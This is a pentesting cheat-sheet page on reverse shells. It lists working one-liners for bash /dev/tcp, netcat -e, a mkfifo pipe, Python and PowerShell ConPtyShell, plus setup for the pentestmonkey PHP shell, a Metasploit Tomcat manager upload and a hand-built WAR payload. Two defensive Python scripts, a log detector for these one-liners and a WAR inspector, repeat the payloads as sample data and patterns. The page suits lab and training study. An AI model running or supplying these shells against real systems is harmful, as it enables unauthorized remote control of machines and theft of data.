Reverse shell

shells_and_payloads fileuploadattacks introtoshells

When a victim machine (the client) connects back to a server controlled by the attacker, we obtain what is called a 'reverse shell': a shell session on the victim through which we can run commands and possibly compromise it further.

The 'reverse' comes from the fact that the target is the one initiating the connection to us, whereas with SSH or other remote-access tools the client is 'normally' the one initiating the connection. 💥

The hacker runs a listener on their machine and waits for the compromised target to connect back to it, i.e. waits for the target to execute the reverse shell payload 🪲.

You will have to configure the reverse shell you select so that it connects back to the listener. For the commands below, the listener host is x.y.z.t and the port is 4444.

If your target is missing a binary, you may be able to download a precompiled version from andrew-d's GitHub (2.8k ⭐, 2020 🪦).

For the listener, you can use the tools listed in Remote Shell or a simple (unstable) netcat listener on the selected port:

$ nc -lvnp 4444 # await the reverse shell payload execution

Revshells website

revshells is a popular website for generating reverse shell payloads, together with the matching listener commands.

  • Example: "Bash" client
    $ sh -i >& /dev/tcp/x.y.z.t/4444 0>&1
  • Example: "nc.exe -e" client
    PS> nc.exe x.y.z.t 4444 -e sh

➡️ Select one based on what command you can run on the target.

Other alternatives are:


PHP reverse shell

You could check out this script by pentestmonkey (1.4k ⭐, 2015). This is a well-known reference.

On Kali Linux, there is a local copy in /usr/share/webshells/php/. Copy it and replace the default address (127.0.0.1) and port (1234) with your listener's:

$ cp /usr/share/webshells/php/php-reverse-shell.php /tmp/revshell.php
$ sed -i 's/127.0.0.1/x.y.z.t/' /tmp/revshell.php
$ sed -i 's/1234/4444/' /tmp/revshell.php

netcat client

introtoshells

The most common usage is:

$ nc -c /bin/bash x.y.z.t 4444

The classic form uses netcat's -e option, which is often not available due to security measures:

$ nc x.y.z.t 4444 -e /bin/bash

Linux targets

TCP socket

$ /bin/bash -i >& /dev/tcp/x.y.z.t/4444 0>&1

Named pipe

shells_and_payloads

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc x.y.z.t 4444 >/tmp/f

PHP

Serve the configured PHP reverse shell (see above) from your machine, fetch it on the target and run it:

$ curl http://$IP:$PORT/revshell.php -o /dev/shm/revshell.php
$ php /dev/shm/revshell.php

Python

$ export RHOST="10.9.168.80";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Windows targets

You can try ConPtyShell (0.7k ⭐).

PS> IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing)
PS> Invoke-ConPtyShell x.y.z.t 4444

You can also try powercat (1.8k ⭐, a PowerShell netcat client/server).
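From the defender's side, every payload family collected in the netcat, Linux, PHP and Windows sections above leaves a recognisable shape in process-execution telemetry. The following script is an added example (not from this page's author or any project it links): it scans process records for those shapes and reports which rule fired. The record format (`pid=… user=… cmd=…`) and the sample lines are constructed for the example, with 203.0.113.5 standing in for the listener host x.y.z.t.

```python
"""Flag process command lines that match the reverse-shell one-liners collected
on this page. Added example, not from the page's author or any referenced
project. The log format is constructed for the example: one process record per
line, "pid=<n> user=<name> cmd=<command line>"; real telemetry (auditd execve,
EDR process events) carries the same three fields under other names.
"""
import re
from dataclasses import dataclass, field

# One rule per payload family shown on this page. Each regex keys on the part of
# the one-liner that is hard to drop: the /dev/tcp pseudo-device path, the fifo
# plumbed into nc, the exec flag, the socket-to-pty dup, the PowerShell cradle.
RULES = [
    ("bash-dev-tcp",       re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    ("mkfifo-nc-pipe",     re.compile(r"mkfifo\s+\S+.*\|\s*(?:nc|ncat|netcat)\s")),
    ("nc-exec-flag",       re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-[ce]\s+\S*(?:sh|cmd|powershell)")),
    ("python-socket-pty",  re.compile(r"socket\.socket\(.*pty\.spawn\(")),
    ("exec-from-dev-shm",  re.compile(r"\b(?:php|python3?|perl|sh|bash)\s+/dev/shm/")),
    ("powershell-conpty",  re.compile(r"Invoke-ConPtyShell|powercat", re.IGNORECASE)),
    ("powershell-iex-iwr", re.compile(r"\bIEX\s*\(\s*IWR\b", re.IGNORECASE)),
]

RECORD = re.compile(r"pid=(?P<pid>\d+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)")


@dataclass
class Finding:
    pid: int
    user: str
    cmd: str
    rules: list = field(default_factory=list)


def scan_line(line: str):
    """Return a Finding listing every rule the record's command line matches,
    or None when the line is unparsable or matches nothing."""
    m = RECORD.match(line.strip())
    if not m:
        return None
    cmd = m.group("cmd")
    matched = [name for name, rx in RULES if rx.search(cmd)]
    if not matched:
        return None
    return Finding(int(m.group("pid")), m.group("user"), cmd, matched)


def scan(lines):
    """Scan an iterable of records and return the findings in input order."""
    return [f for f in map(scan_line, lines) if f is not None]


# Constructed sample log. Records 4103 (a plain listener) and 4106 (a backup
# job) match no rule and show the rules do not fire on ordinary nc/tar usage.
SAMPLE_LOG = [
    "pid=4101 user=www-data cmd=bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "pid=4102 user=www-data cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 203.0.113.5 4444 >/tmp/f",
    "pid=4103 user=alice cmd=nc -lvnp 4444",
    "pid=4104 user=www-data cmd=nc 203.0.113.5 4444 -e /bin/bash",
    "pid=4105 user=www-data cmd=python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((\"203.0.113.5\",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'",
    "pid=4106 user=bob cmd=tar -czf /tmp/backup.tgz /var/www",
    "pid=4107 user=www-data cmd=php /dev/shm/revshell.php",
    "pid=4108 user=bob cmd=powershell.exe -c IEX(IWR https://example.invalid/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 203.0.113.5 4444",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"pid={f.pid} user={f.user} rules={','.join(f.rules)} :: {f.cmd[:60]}")
```

The rules are deliberately narrow (a word-bounded `nc` followed by `-e`/`-c` and a shell, not just any `-e`), so the listener on record 4103 and the `python3 -c` on record 4105 are not confused with the netcat exec form; widen them only with a matching set of benign control lines so false positives stay visible.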


Tomcat Reverse Shell

You can use Metasploit to both generate a shell and upload it. Note that it doesn't work with at least Tomcat 7.8.

$ msfconsole -q
msf6> use exploit/multi/http/tomcat_mgr_upload
msf6> set RHOSTS <target>
msf6> set RPORT 8080
msf6> set HttpUsername username
msf6> set HttpPassword password
msf6> set LHOST tun0
msf6> set VERBOSE true # error 500 == it won't work
msf6> run

You can use msfvenom to generate a reverse shell.

You can also create one manually. For the contents of index.jsp, you can use the Metasploit one or this one, which is similar.

$ nano index.jsp # fill this file
$ jar -cvf ../revshell.war index.jsp  # it works in v7
$ zip -r revshell.war index.jsp       # it works in v7
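The hand-built revshell.war above is a lone index.jsp zipped up with no WEB-INF/, which is also what makes it easy to spot when reviewing what was deployed through the Tomcat manager. The following script is an added example (not Tomcat's, Metasploit's or this page's code): it opens a WAR, flags JSPs that spawn processes or open raw sockets, and separately flags the "only root-level JSPs" layout. The WAR files are constructed in memory so it runs offline, and the JSP bodies are marker fragments, not working payloads.

```python
"""Inspect a .war archive for the hand-rolled reverse-shell deployment described
above (a lone index.jsp zipped into revshell.war). Added example, not Tomcat's
or Metasploit's code; the WAR files are constructed in memory so the check runs
offline, and the JSP bodies are marker fragments, not working payloads.
"""
import io
import re
import zipfile

# Java constructs a JSP needs in order to spawn a process or open a raw socket;
# ordinary JSP views do not contain them.
EXEC_PATTERNS = [
    re.compile(r"Runtime\.getRuntime\(\)\.exec\("),
    re.compile(r"new\s+ProcessBuilder\("),
    re.compile(r"new\s+(?:java\.net\.)?Socket\("),
]


def inspect_war(data: bytes) -> dict:
    """Summarise a WAR's layout and list (member, pattern) hits in its JSPs."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        hits = []
        for name in names:
            if not name.lower().endswith((".jsp", ".jspx")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            hits += [(name, rx.pattern) for rx in EXEC_PATTERNS if rx.search(text)]
    root_jsps = [n for n in names if "/" not in n and n.lower().endswith(".jsp")]
    return {
        "members": len(names),
        "has_web_inf": any(n.startswith("WEB-INF/") for n in names),
        "root_jsps": root_jsps,
        "exec_hits": hits,
    }


def verdict(report: dict) -> str:
    """'exec-code' when a JSP spawns processes or sockets, 'minimal-war' when the
    archive is nothing but root-level JSPs (the `zip -r revshell.war index.jsp`
    shape), otherwise 'clean'."""
    if report["exec_hits"]:
        return "exec-code"
    if (not report["has_web_inf"] and report["root_jsps"]
            and len(report["root_jsps"]) == report["members"]):
        return "minimal-war"
    return "clean"


def build_war(files: dict) -> bytes:
    """Build a WAR (a plain zip) from {member name: content}; used for samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a one-file WAR whose JSP carries an exec marker, a
# one-file WAR with a harmless JSP, and a normally laid out application.
SUSPICIOUS_WAR = build_war({
    "index.jsp": '<%@ page import="java.io.*" %>\n'
                 "<% Runtime.getRuntime().exec(cmd); /* marker only */ %>\n",
})
MINIMAL_WAR = build_war({"index.jsp": "<html><body>Hello</body></html>\n"})
BENIGN_WAR = build_war({
    "WEB-INF/web.xml": "<web-app/>\n",
    "index.jsp": "<html><body>Hello <%= request.getRemoteUser() %></body></html>\n",
    "css/site.css": "body { margin: 0 }\n",
})

if __name__ == "__main__":
    for label, war in [("suspicious", SUSPICIOUS_WAR), ("minimal", MINIMAL_WAR),
                       ("benign", BENIGN_WAR)]:
        r = inspect_war(war)
        print(f"{label}: {verdict(r)} members={r['members']} hits={r['exec_hits']}")
```

Run it over the archives under Tomcat's webapps directory (or over what the manager's deploy endpoint received) to catch both the Metasploit-generated WAR and the manual jar/zip one; the 'minimal-war' verdict is a layout heuristic, so treat it as a prompt for review rather than a hard block.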

👻 To-do 👻

Stuff that I found but never read/used yet.

  • Python/Mkfifo shells are often more likely to work
  • Try double reverse shell?
  • r57shell